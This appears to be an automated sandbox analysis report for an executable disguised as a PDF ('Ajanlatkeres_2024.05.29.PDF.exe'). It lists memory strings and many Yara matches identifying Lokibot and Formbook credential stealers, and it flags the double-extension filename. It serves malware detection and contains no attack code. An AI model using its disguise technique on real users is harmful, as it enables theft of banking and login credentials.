Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1348137626.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757850550.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2293895318.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084622640.000000000899E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stacker.com/arizona/phoenix
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.yelp.com

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: YLc7afPlL4RjCeK.exe PID: 7524, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7700, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: chkdsk.exe PID: 7864, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Ajanlatkeres_2024.05.29.PDF.exe

